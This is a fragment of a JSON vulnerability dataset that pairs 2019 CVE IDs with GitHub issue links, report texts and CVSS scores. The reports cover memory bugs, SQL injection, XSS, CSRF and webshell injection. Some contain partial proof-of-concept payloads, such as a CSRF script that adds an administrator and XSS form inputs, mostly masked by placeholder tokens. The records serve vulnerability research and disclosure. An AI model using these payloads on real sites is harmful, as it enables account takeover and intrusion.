  44166. "Issue_Url_new": "https://github.com/boolector/boolector/issues/28",
  44167. "Repo_new": "boolector/boolector",
  44168. "Issue_Created_At": "2019-01-15T17:10:27Z",
  44169. "description": "Use After Free in btor_delete. While fuzzing boolector, APITAG APITAG this input file APITAG ERRORTAG APITAG was found, which leads to a use after free in btor_delete. The attached file contains more lines leading to the same crash, the above file contains the minimal version. FILETAG FILETAG FILETAG APITAG APITAG ASAN trace APITAG ERRORTAG APITAG APITAG APITAG trace APITAG ERRORTAG APITAG Used version APITAG Steps to reproduce APITAG",
  44170. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44171. "severity": "MEDIUM",
  44172. "baseScore": 5.5,
  44173. "impactScore": 3.6,
  44174. "exploitabilityScore": 1.8
  44175. },
  44176. {
  44177. "CVE_ID": "CVE-2019-7566",
  44178. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/17",
  44179. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/17",
  44180. "Repo_new": "cskaza/cszcms",
  44181. "Issue_Created_At": "2019-01-17T02:13:39Z",
  44182. "description": "There is one CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following page poc\uff1a APITAG add a administrator APITAG APITAG APITAG APITAG '', '/') APITAG APITAG function APITAG { var xhr = new APITAG APITAG PATHTAG true); APITAG Type\", \"multipart\\/form data; boundary= APITAG APITAG PATHTAG \\/ ; APITAG APITAG Language\", \"zh CN,zh; APITAG APITAG = true; var body = \" APITAG \" + APITAG Disposition: form data; name= csrf_csz \" + \" \" + APITAG \" + \" APITAG \" + APITAG Disposition: form data; name= name \" + \" \" + \"test3 \" + \" APITAG \" + APITAG Disposition: form data; name= email \" + \" \" + \" EMAILTAG \" + \" APITAG \" + APITAG Disposition: form data; name= password \" + \" \" + \"test3 \" + \" APITAG \" + APITAG Disposition: form data; name= con_password \" + \" \" + \"test3 \" + \" APITAG \" + APITAG Disposition: form data; name= group NUMBERTAG APITAG \" + APITAG Disposition: form data; name= active NUMBERTAG APITAG \" + APITAG Disposition: form data; name= first_name \" + \" \" + \"te \" + \" APITAG \" + APITAG Disposition: form data; name= last_name \" + \" \" + \"st \" + \" APITAG \" + APITAG Disposition: form data; name= year NUMBERTAG APITAG \" + APITAG Disposition: form data; name= month NUMBERTAG APITAG \" + APITAG Disposition: form data; name= day NUMBERTAG APITAG \" + APITAG Disposition: form data; name= gender \" + \" \" + \"male \" + \" APITAG \" + APITAG Disposition: form data; name= address NUMBERTAG APITAG \" + APITAG Disposition: form data; name= phone NUMBERTAG APITAG \" + APITAG Disposition: form data; name= file_upload ; filename= \" + APITAG Type: application/octet stream \" + \" \" + \" \" + \" APITAG \" + APITAG Disposition: form data; name= submit \" + \" \" + APITAG \" + \" APITAG \"; var APITAG = new APITAG for (var i NUMBERTAG i APITAG APITAG APITAG APITAG APITAG APITAG",
  44183. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44184. "severity": "HIGH",
  44185. "baseScore": 8.8,
  44186. "impactScore": 5.9,
  44187. "exploitabilityScore": 2.8
  44188. },
  44189. {
  44190. "CVE_ID": "CVE-2019-7567",
  44191. "Issue_Url_old": "https://github.com/caokang/waimai/issues/10",
  44192. "Issue_Url_new": "https://github.com/caokang/waimai/issues/10",
  44193. "Repo_new": "caokang/waimai",
  44194. "Issue_Created_At": "2019-01-07T05:48:22Z",
  44195. "description": "There are Storage type xss vulnerabilities in the add administrator NUMBERTAG Presence address POST APITAG NUMBERTAG data pack POST APITAG HTTP NUMBERTAG Host: localhost NUMBERTAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: URLTAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG SE NUMBERTAG APITAG NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG NUMBERTAG b NUMBERTAG c NUMBERTAG f NUMBERTAG e8ae3d NUMBERTAG APITAG NUMBERTAG cke NUMBERTAG laig NUMBERTAG APITAG Connection: close APITAG Content Disposition: form data; name=\"username\" '> APITAG alert NUMBERTAG APITAG APITAG Content Disposition: form data; name=\"password\" '> APITAG alert NUMBERTAG APITAG APITAG Content Disposition: form data; name=\"repassword\" '> APITAG alert NUMBERTAG APITAG APITAG NUMBERTAG Proof screenshot \u622a\u56fe\u89c1: FILETAG",
  44196. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44197. "severity": "MEDIUM",
  44198. "baseScore": 6.1,
  44199. "impactScore": 2.7,
  44200. "exploitabilityScore": 2.8
  44201. },
  44202. {
  44203. "CVE_ID": "CVE-2019-7568",
  44204. "Issue_Url_old": "https://github.com/baijiacms/baijiacmsV4/issues/2",
  44205. "Issue_Url_new": "https://github.com/baijiacms/baijiacmsv4/issues/2",
  44206. "Repo_new": "baijiacms/baijiacmsv4",
  44207. "Issue_Created_At": "2019-01-08T07:03:58Z",
  44208. "description": "Two Vulnerability of Time based SQL injection NUMBERTAG description Two time based SQL blinds to get data NUMBERTAG POC First: URLTAG second: URLTAG NUMBERTAG description request the url: URLTAG No time delay Screenshot: FILETAG request the url: URLTAG time delay Screenshot: FILETAG Test with sqlmap: FILETAG",
  44209. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44210. "severity": "CRITICAL",
  44211. "baseScore": 9.8,
  44212. "impactScore": 5.9,
  44213. "exploitabilityScore": 3.9
  44214. },
  44215. {
  44216. "CVE_ID": "CVE-2019-7569",
  44217. "Issue_Url_old": "https://github.com/millken/doyocms/issues/1",
  44218. "Issue_Url_new": "https://github.com/millken/doyocms/issues/1",
  44219. "Repo_new": "millken/doyocms",
  44220. "Issue_Created_At": "2019-01-17T13:42:28Z",
  44221. "description": "There is a CSRF vulnerability that can add the super administrator account . After the super administrator logged in, open the following page poc\uff1a APITAG add a super administrator CODETAG",
  44222. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44223. "severity": "HIGH",
  44224. "baseScore": 8.8,
  44225. "impactScore": 5.9,
  44226. "exploitabilityScore": 2.8
  44227. },
  44228. {
  44229. "CVE_ID": "CVE-2019-7581",
  44230. "Issue_Url_old": "https://github.com/libming/libming/issues/173",
  44231. "Issue_Url_new": "https://github.com/libming/libming/issues/173",
  44232. "Repo_new": "libming/libming",
  44233. "Issue_Created_At": "2019-01-17T09:18:12Z",
  44234. "description": "Memory allocation failure in APITAG (parser.c NUMBERTAG different from NUMBERTAG ersion: master( commit APITAG ) command: listswf $FILE OS: Ubuntu NUMBERTAG LTS NUMBERTAG bit ERRORTAG Download: poc URLTAG",
  44235. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44236. "severity": "HIGH",
  44237. "baseScore": 8.8,
  44238. "impactScore": 5.9,
  44239. "exploitabilityScore": 2.8
  44240. },
  44241. {
  44242. "CVE_ID": "CVE-2019-7582",
  44243. "Issue_Url_old": "https://github.com/libming/libming/issues/172",
  44244. "Issue_Url_new": "https://github.com/libming/libming/issues/172",
  44245. "Repo_new": "libming/libming",
  44246. "Issue_Created_At": "2019-01-17T09:17:38Z",
  44247. "description": "Memory allocation failure in APITAG APITAG version: master( commit APITAG ) command: listswf $FILE OS: Ubuntu NUMBERTAG LTS NUMBERTAG bit ERRORTAG Download: poc URLTAG",
  44248. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44249. "severity": "HIGH",
  44250. "baseScore": 8.8,
  44251. "impactScore": 5.9,
  44252. "exploitabilityScore": 2.8
  44253. },
  44254. {
  44255. "CVE_ID": "CVE-2019-7585",
  44256. "Issue_Url_old": "https://github.com/caokang/waimai/issues/11",
  44257. "Issue_Url_new": "https://github.com/caokang/waimai/issues/11",
  44258. "Repo_new": "caokang/waimai",
  44259. "Issue_Created_At": "2019-01-17T08:03:07Z",
  44260. "description": "A Time based blind SQL Injection in email check. When registering a new account, it will verify that the email address is being used. PATHTAG ERRORTAG We can bypass the SQL filter using this payload: APITAG FILETAG The final SQL statement would be APITAG And here is the exp to obtain admin's password hash: CODETAG",
  44261. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44262. "severity": "CRITICAL",
  44263. "baseScore": 9.8,
  44264. "impactScore": 5.9,
  44265. "exploitabilityScore": 3.9
  44266. },
  44267. {
  44268. "CVE_ID": "CVE-2019-7648",
  44269. "Issue_Url_old": "https://github.com/FantasticLBP/Hotels_Server/issues/2",
  44270. "Issue_Url_new": "https://github.com/fantasticlbp/hotels_server/issues/2",
  44271. "Repo_new": "fantasticlbp/hotels_server",
  44272. "Issue_Created_At": "2019-01-20T15:01:48Z",
  44273. "description": "Using of BASE NUMBERTAG Encoding for storage of password and retrieval of password. The application uses B NUMBERTAG encoding for storage of password Obscuring a password with a trivial encoding does not protect the password. FILETAG CVETAG URLTAG",
  44274. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  44275. "severity": "HIGH",
  44276. "baseScore": 7.5,
  44277. "impactScore": 3.6,
  44278. "exploitabilityScore": 3.9
  44279. },
  44280. {
  44281. "CVE_ID": "CVE-2019-7649",
  44282. "Issue_Url_old": "https://github.com/arterli/CmsWing/issues/41",
  44283. "Issue_Url_new": "https://github.com/arterli/cmswing/issues/41",
  44284. "Repo_new": "arterli/cmswing",
  44285. "Issue_Created_At": "2019-02-17T18:32:15Z",
  44286. "description": "Encryption of password using MD5 and fixed salt. APITAG = function(password, md5encoded) { md5encoded = md5encoded || false; password = md5encoded ? password : APITAG return APITAG + password + APITAG };",
  44287. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  44288. "severity": "HIGH",
  44289. "baseScore": 7.5,
  44290. "impactScore": 3.6,
  44291. "exploitabilityScore": 3.9
  44292. },
  44293. {
  44294. "CVE_ID": "CVE-2019-7662",
  44295. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1872",
  44296. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1872",
  44297. "Repo_new": "webassembly/binaryen",
  44298. "Issue_Created_At": "2019-01-16T07:22:23Z",
  44299. "description": "Assertion failures were discovered in APITAG in wasm APITAG Hi there, Multiple Assertion failures were discovered in APITAG in wasm binary.cpp Here are the POC files. Please use \"./wasm opt $POC\" to reproduce the error. FILETAG $git log CODETAG The output was shown as follows: CODETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  44300. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44301. "severity": "MEDIUM",
  44302. "baseScore": 6.5,
  44303. "impactScore": 3.6,
  44304. "exploitabilityScore": 2.8
  44305. },
  44306. {
  44307. "CVE_ID": "CVE-2019-7697",
  44308. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/351",
  44309. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/351",
  44310. "Repo_new": "axiomatic-systems/bento4",
  44311. "Issue_Created_At": "2019-01-01T09:47:39Z",
  44312. "description": "Multiple Assertion failures were discovered in APITAG ) in APITAG Hi there, Multiple Assertion failures were discovered in APITAG ) in APITAG Here are the POC files. Please use \"./mp NUMBERTAG hls $POC\" to reproduce the error. FILETAG The output was shown as follows: CODETAG",
  44313. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44314. "severity": "MEDIUM",
  44315. "baseScore": 6.5,
  44316. "impactScore": 3.6,
  44317. "exploitabilityScore": 2.8
  44318. },
  44319. {
  44320. "CVE_ID": "CVE-2019-7698",
  44321. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/354",
  44322. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/354",
  44323. "Repo_new": "axiomatic-systems/bento4",
  44324. "Issue_Created_At": "2019-01-01T10:46:25Z",
  44325. "description": "when running mp4dump, there is an out of memory problem in APITAG in APITAG Hi, there. I tested the program at the master branch. ERRORTAG An Out of Memory problem was discovered in function APITAG in APITAG The program tries to allocate with a large number size NUMBERTAG eff NUMBERTAG bytes) of memory. Please use the \"./mp4dump $POC\" to reproduce the bug. FILETAG",
  44326. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44327. "severity": "MEDIUM",
  44328. "baseScore": 6.5,
  44329. "impactScore": 3.6,
  44330. "exploitabilityScore": 2.8
  44331. },
  44332. {
  44333. "CVE_ID": "CVE-2019-7699",
  44334. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/355",
  44335. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/355",
  44336. "Repo_new": "axiomatic-systems/bento4",
  44337. "Issue_Created_At": "2019-01-01T11:33:09Z",
  44338. "description": "When running avcinfo, a heap buffer overflow occurs in function APITAG in APITAG Hi, there. A Heap buffer overflow problem was discovered in function APITAG char const , unsigned int) in APITAG A crafted input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./avcinfo $POC\" to reproduce the error. FILETAG ERRORTAG $ git log ERRORTAG",
  44339. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44340. "severity": "MEDIUM",
  44341. "baseScore": 6.5,
  44342. "impactScore": 3.6,
  44343. "exploitabilityScore": 2.8
  44344. },
  44345. {
  44346. "CVE_ID": "CVE-2019-7701",
  44347. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1863",
  44348. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1863",
  44349. "Repo_new": "webassembly/binaryen",
  44350. "Issue_Created_At": "2019-01-12T11:46:51Z",
  44351. "description": "A Heap buffer overflow problem was discovered in function APITAG in wasm s parser.cpp in wasm.. Hi, there. A Heap buffer overflow problem was discovered in function APITAG in wasm s parser.cpp in wasm. A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm2js $POC\" to reproduce the error. FILETAG The ASAN dumps the stack trace as follows: ERRORTAG $ git log ERRORTAG",
  44352. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44353. "severity": "MEDIUM",
  44354. "baseScore": 6.5,
  44355. "impactScore": 3.6,
  44356. "exploitabilityScore": 2.8
  44357. },
  44358. {
  44359. "CVE_ID": "CVE-2019-7702",
  44360. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1867",
  44361. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1867",
  44362. "Repo_new": "webassembly/binaryen",
  44363. "Issue_Created_At": "2019-01-13T12:08:46Z",
  44364. "description": "Null pointer Deference in APITAG in wasm s APITAG Hi, there. A Null pointer Deference problem was discovered in APITAG in wasm s APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \" APITAG \" or \" APITAG \" to reproduce the problem. FILETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  44365. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44366. "severity": "MEDIUM",
  44367. "baseScore": 6.5,
  44368. "impactScore": 3.6,
  44369. "exploitabilityScore": 2.8
  44370. },
  44371. {
  44372. "CVE_ID": "CVE-2019-7703",
  44373. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1865",
  44374. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1865",
  44375. "Repo_new": "webassembly/binaryen",
  44376. "Issue_Created_At": "2019-01-12T12:32:49Z",
  44377. "description": "A Use after free problem in APITAG ) function in wasm APITAG Hi, there. A Use after free problem was discovered in APITAG ) function in wasm APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm merge $POC\" to reproduce the error. FILETAG $ git log ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  44378. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44379. "severity": "MEDIUM",
  44380. "baseScore": 6.5,
  44381. "impactScore": 3.6,
  44382. "exploitabilityScore": 2.8
  44383. },
  44384. {
  44385. "CVE_ID": "CVE-2019-7704",
  44386. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1866",
  44387. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1866",
  44388. "Repo_new": "webassembly/binaryen",
  44389. "Issue_Created_At": "2019-01-12T12:56:27Z",
  44390. "description": "Out of Memory Problem in function APITAG long). Hi, there. A Out of Memory problem was discovered in APITAG long) function in wasm APITAG A crafted wasm input can cause segment faults and I have confirmed them with address sanitizer too NUMBERTAG Program Abort because of std::bad_alloc exception. Use \"./wasm merge $POC\" to reproduce the error. FILETAG Program Output APITAG The ASAN dumps the stack trace as follows: ERRORTAG NUMBERTAG possibly invalid request for silly amounts of memory Use \"wasm opt $POC\" to reproduce the error. FILETAG Program Output ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  44391. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  44392. "severity": "MEDIUM",
  44393. "baseScore": 6.5,
  44394. "impactScore": 3.6,
  44395. "exploitabilityScore": 2.8
  44396. },
  44397. {
  44398. "CVE_ID": "CVE-2019-7719",
  44399. "Issue_Url_old": "https://github.com/dignajar/nibbleblog/issues/138",
  44400. "Issue_Url_new": "https://github.com/dignajar/nibbleblog/issues/138",
  44401. "Repo_new": "dignajar/nibbleblog",
  44402. "Issue_Created_At": "2019-01-28T02:55:24Z",
  44403. "description": "one can insert malicious code in the installation process to get a web shell. In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell Source: . APITAG NUMBERTAG text = '<?php $_USER FILETAG exploit: URLTAG FILETAG",
  44404. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44405. "severity": "CRITICAL",
  44406. "baseScore": 9.8,
  44407. "impactScore": 5.9,
  44408. "exploitabilityScore": 3.9
  44409. },
  44410. {
  44411. "CVE_ID": "CVE-2019-7720",
  44412. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/1",
  44413. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/1",
  44414. "Repo_new": "taogogo/taocms",
  44415. "Issue_Created_At": "2019-01-28T14:34:00Z",
  44416. "description": "one can insert malicious code in the installation process to get a web shell. In the CMS installation process, the configuration file filtering is not rigorous, you can insert malicious code in the installation process to execute arbitrary commands, and even get Webshell Source: . APITAG NUMBERTAG APITAG $_POST FILETAG exploit: URLTAG FILETAG",
  44417. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44418. "severity": "CRITICAL",
  44419. "baseScore": 9.8,
  44420. "impactScore": 5.9,
  44421. "exploitabilityScore": 3.9
  44422. },
  44423. {
  44424. "CVE_ID": "CVE-2019-7721",
  44425. "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/14",
  44426. "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/14",
  44427. "Repo_new": "gnat/nc-cms",
  44428. "Issue_Created_At": "2019-01-29T02:46:52Z",
  44429. "description": "There is an vulnerability in the filesystem that can get a webshell . Hello, I found that this cms may have some security problem(use default file storage) Source: PATHTAG function APITAG $data) { $path = PATHTAG $fh = APITAG 'w') or ERRORTAG not open file: \".$name.\". Make sure that this server has read and write permissions the /nc cms/content APITAG fwrite($fh, $data); fclose($fh); } PATHTAG else if($action == 'save') { $this APITAG if(isset($_GET FILETAG",
  44430. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  44431. "severity": "HIGH",
  44432. "baseScore": 7.5,
  44433. "impactScore": 3.6,
  44434. "exploitabilityScore": 3.9
  44435. },
  44436. {
  44437. "CVE_ID": "CVE-2019-7722",
  44438. "Issue_Url_old": "https://github.com/pmd/pmd/issues/1650",
  44439. "Issue_Url_new": "https://github.com/pmd/pmd/issues/1650",
  44440. "Repo_new": "pmd/pmd",
  44441. "Issue_Created_At": "2019-02-11T11:58:33Z",
  44442. "description": "core] Advisory XXE attack on ruleset parsing. This issue is for future reference. As part of an unrelated security concern discussion regarding a possible remote code execution (which was discarded as impossible) on a [separate issue URLTAG , I found that our XML parsing wasn't hardened, allowing for XXE attacks. When PMD is run, the ruleset XMLs were parsed with the default Java parser settings, which allowed an attacker to perform an XXE attack. Rulesets can be either local files, or accessed through the network over http / https. So, depending on the context, this attack could require physical access to the machine, or be achieved through a man in the middle attack. The XXE attack can be used to perform information disclosure on the developer's machine, CI servers or other infrastructure running PMD; as well as denial of service attacks and request forgery. All PMD versions up to PMD NUMBERTAG are vulnerable. A fix was produced in URLTAG following OWASP XXE Prevention cheatsheet URLTAG , making all PMD NUMBERTAG releases and later safe.",
  44443. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44444. "severity": "HIGH",
  44445. "baseScore": 8.1,
  44446. "impactScore": 5.9,
  44447. "exploitabilityScore": 2.2
  44448. },
  44449. {
  44450. "CVE_ID": "CVE-2019-7732",
  44451. "Issue_Url_old": "https://github.com/rgaufman/live555/issues/20",
  44452. "Issue_Url_new": "https://github.com/rgaufman/live555/issues/20",
  44453. "Repo_new": "rgaufman/live555",
  44454. "Issue_Created_At": "2019-02-11T04:57:50Z",
  44455. "description": "There is a memory leak in function APITAG which can cause a APITAG In the lastest version of live NUMBERTAG there is a memory leak issue. The attacker can make the server crash with this issue. when parse the setup packet with many username fileds, the value of username will be duplicated many times at NUMBERTAG The pointers of username value can't be freed ever, except for the last one. The fileds realm nonce uri response have the same problem. CODETAG",
  44456. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44457. "severity": "HIGH",
  44458. "baseScore": 7.5,
  44459. "impactScore": 3.6,
  44460. "exploitabilityScore": 3.9
  44461. },
  44462. {
  44463. "CVE_ID": "CVE-2019-7733",
  44464. "Issue_Url_old": "https://github.com/rgaufman/live555/issues/21",
  44465. "Issue_Url_new": "https://github.com/rgaufman/live555/issues/21",
  44466. "Repo_new": "rgaufman/live555",
  44467. "Issue_Created_At": "2019-02-11T05:37:29Z",
  44468. "description": "There is a buffer overflow which can lead to dos in live NUMBERTAG When parse the request packet in function APITAG the code don't check the APITAG , and use it in memmove. Finally cause the buff overflow. ERRORTAG There is a APITAG check, but it only assigns APITAG to false. This can't avoid the memmove . CODETAG I can make the server crash with a simple packet. CODETAG",
  44469. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  44470. "severity": "HIGH",
  44471. "baseScore": 7.5,
  44472. "impactScore": 3.6,
  44473. "exploitabilityScore": 3.9
  44474. },
  44475. {
  44476. "CVE_ID": "CVE-2019-7737",
  44477. "Issue_Url_old": "https://github.com/Verytops/verydows/issues/10",
  44478. "Issue_Url_new": "https://github.com/verytops/verydows/issues/10",
  44479. "Repo_new": "verytops/verydows",
  44480. "Issue_Created_At": "2019-02-11T15:44:47Z",
  44481. "description": "CSRF Vulnerability that can add admin user. A CSRF vulnerability was found in this cms. Logged in administrator user may add another administrator account by clicking following POC APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  44482. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44483. "severity": "HIGH",
  44484. "baseScore": 8.8,
  44485. "impactScore": 5.9,
  44486. "exploitabilityScore": 2.8
  44487. },
  44488. {
  44489. "CVE_ID": "CVE-2019-7738",
  44490. "Issue_Url_old": "https://github.com/cooltey/C.P.Sub/issues/3",
  44491. "Issue_Url_new": "https://github.com/cooltey/c.p.sub/issues/3",
  44492. "Repo_new": "cooltey/c.p.sub",
  44493. "Issue_Created_At": "2018-09-20T16:50:57Z",
  44494. "description": "CSRF Delete an announcement article arbitrarily. Hey , APITAG In your Background admin delete Article section, did not produce relevant token verification source caused CSRF, and the \"get\" parameter value is very dangerous. List\uff1a URLTAG Poc Payload\uff1a > GET APITAG HTTP NUMBERTAG Host: your_website > Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG > Accept Encoding: gzip, deflate > Accept Language: zh TW,zh; APITAG US; APITAG > Cookie: APITAG APITAG wp settings NUMBERTAG mfold NUMBERTAG Do; wp settings time NUMBERTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG > Connection: close FILETAG Poc Payload\uff1a CODETAG",
  44495. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  44496. "severity": "MEDIUM",
  44497. "baseScore": 6.5,
  44498. "impactScore": 3.6,
  44499. "exploitabilityScore": 2.8
  44500. },
  44501. {
  44502. "CVE_ID": "CVE-2019-7753",
  44503. "Issue_Url_old": "https://github.com/Verytops/verydows/issues/11",
  44504. "Issue_Url_new": "https://github.com/verytops/verydows/issues/11",
  44505. "Repo_new": "verytops/verydows",
  44506. "Issue_Created_At": "2019-02-12T09:43:29Z",
  44507. "description": "XSS vulnerability which can steal admin's cookies or more!. In page APITAG where users' visiting are logged, we can modify the POST parameter \"referrer\" which will be shown without filtering to administrator. As a result, hacker can construct a XSS payload to steal admin's cookies! payload: FILETAG result: FILETAG",
  44508. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44509. "severity": "MEDIUM",
  44510. "baseScore": 6.1,
  44511. "impactScore": 2.7,
  44512. "exploitabilityScore": 2.8
  44513. },
  44514. {
  44515. "CVE_ID": "CVE-2019-8334",
  44516. "Issue_Url_old": "https://github.com/gongfuxiang/schoolcms/issues/1",
  44517. "Issue_Url_new": "https://github.com/gongfuxiang/schoolcms/issues/1",
  44518. "Repo_new": "gongfuxiang/schoolcms",
  44519. "Issue_Created_At": "2019-02-13T07:43:01Z",
  44520. "description": "There is three xss vulnerability that can get the administrator cookie.",
  44521. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44522. "severity": "MEDIUM",
  44523. "baseScore": 6.1,
  44524. "impactScore": 2.7,
  44525. "exploitabilityScore": 2.8
  44526. },
  44527. {
  44528. "CVE_ID": "CVE-2019-8336",
  44529. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5423",
  44530. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5423",
  44531. "Repo_new": "hashicorp/consul",
  44532. "Issue_Created_At": "2019-03-04T19:17:00Z",
  44533. "description": "TBD.",
  44534. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  44535. "severity": "HIGH",
  44536. "baseScore": 8.1,
  44537. "impactScore": 5.9,
  44538. "exploitabilityScore": 2.2
  44539. },
  44540. {
  44541. "CVE_ID": "CVE-2019-8347",
  44542. "Issue_Url_old": "https://github.com/source-trace/beescms/issues/4",
  44543. "Issue_Url_new": "https://github.com/source-trace/beescms/issues/4",
  44544. "Repo_new": "source-trace/beescms",
  44545. "Issue_Created_At": "2019-02-14T10:56:52Z",
  44546. "description": "There is a CSRF vulnerability that can add arbitrary VIP accounts. After the administrator logged in, open the following one page. POC\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG URLTAG URLTAG FILETAG",
  44547. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  44548. "severity": "HIGH",
  44549. "baseScore": 8.8,
  44550. "impactScore": 5.9,
  44551. "exploitabilityScore": 2.8
  44552. },
  44553. {
  44554. "CVE_ID": "CVE-2019-8363",
  44555. "Issue_Url_old": "https://github.com/Verytops/verydows/issues/12",
  44556. "Issue_Url_new": "https://github.com/verytops/verydows/issues/12",
  44557. "Repo_new": "verytops/verydows",
  44558. "Issue_Created_At": "2019-02-14T01:28:45Z",
  44559. "description": "Reflected Cross Site FILETAG . Environment installed from verydows master In page APITAG the Get function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse Payload used: APITAG APITAG Affected URL: URLTAG Navigate to the Affected URL, Payload would be triggered. To Reproduce Affected URL : URLTAG APITAG Payload used APITAG Navigate to the Affected URL, Payload would be triggered. FILETAG",
  44560. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  44561. "severity": "MEDIUM",
  44562. "baseScore": 6.1,
  44563. "impactScore": 2.7,
  44564. "exploitabilityScore": 2.8
  44565. },
  44566. {
  44567. "CVE_ID": "CVE-2019-8376",
  44568. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/537",
  44569. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/537",
  44570. "Repo_new": "appneta/tcpreplay",
